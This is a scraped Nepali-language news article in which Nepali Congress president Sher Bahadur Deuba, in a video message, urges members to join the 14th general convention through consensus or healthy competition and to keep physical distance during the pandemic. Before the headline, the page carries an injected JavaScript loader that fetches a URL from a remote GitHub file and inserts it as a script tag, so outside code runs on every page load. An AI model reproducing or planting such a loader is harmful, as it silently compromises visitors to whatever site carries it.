;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ‘महाधिवेशनमार्फत् हामी कांग्रेसलाई शशक्त बनाउने अभियानमा होमिइसकेका छौं,’- सभापति देउवा – जुनेली न्युज
मङ्लबार, असार ११, २०८२
  • होमपेज
  • ‘महाधिवेशनमार्फत् हामी कांग्रेसलाई शशक्त बनाउने अभियानमा होमिइसकेका छौं,’- सभापति देउवा
राजनीति

‘महाधिवेशनमार्फत् हामी कांग्रेसलाई शशक्त बनाउने अभियानमा होमिइसकेका छौं,’- सभापति देउवा

जुनेली न्यूज, काठमाण्डौ | नेपाली कांग्रेसका सभापति तथा प्रधानमन्त्रीसमेत रहेका शेरबहादुर देउवाले १४ औं महाधिवेशनमा लोकतान्त्रिक प्रक्रिया अनुसार सर्वसम्मत वा स्वस्थ प्रतिस्पर्धामार्फत अधिवेशनमा सहभागी हुन अनुरोध गरेका छन् |
वडा अधिवेशन सुरू हुने दिन आज बिहान भिडिओ सन्देश जारी गर्दै देउवाले यस्तो बताएका हुन् । उनले १४ औं महाधिवेशनमा सबै होमिइसकेको बताए ।

पार्टीलाई थप बलियो बनाउने अभियानमा होमिइसकेको उनको भनाई छ । उनले भने ‘म तपाईंहरूलाई जनताको विश्वास जितेर अघि बढ्ने प्रण गर्दछु । १४ औं महाधिवेशनमार्फत् हामी कांग्रेसलाई शशक्त बनाउने अभियानमा होमिइसकेका छौं,’

उनले देशभरका क्रियाशील सदस्य, नेता/कार्यकर्तालाई अधिवेशनमा भाग लिन आह्वान पनि गरे । ‘पार्टीभित्रको आन्तरिक प्रतिस्पर्धा लोकतन्त्रको सौन्दर्य हो । स्वस्थ प्रतिस्पर्धाले पार्टीको समग्र संगठनको जग मजबुत बनाउदै जन–जनमा लोकतन्त्रको रक्तसंचार गर्छ ।’ देउवाले भनेका छन्, ‘देशभरका साथिहरुलाई लोकतान्त्रिक प्रक्रिया अनुसार सर्वसम्मत वा स्वस्थ प्रतिस्पर्धामार्फत अधिवेशनमा सहभागी हुन अनुरोध गर्दछु ।’

संवैधानिक बाध्यताअनुसार कोरोना महामारीकै बीच महाधिवेशन सुरु गर्नुपरेको बताउँदै सभापति देउवाले अधिवेशनमा सहभागी हुँदा भौतिक दूरी कायम गर्न पनि सम्बन्धित सबैलाई आग्रह गरेका छन् ।

 

फेसबुक प्रतिक्रियाहरु